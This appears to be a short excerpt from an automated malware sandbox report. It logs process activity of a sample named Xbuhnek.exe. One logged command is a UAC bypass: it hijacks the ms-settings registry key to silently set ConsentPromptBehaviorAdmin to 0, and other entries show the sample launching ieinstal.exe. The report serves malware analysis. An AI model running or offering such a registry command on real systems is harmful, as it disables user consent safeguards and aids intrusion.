              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /fJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected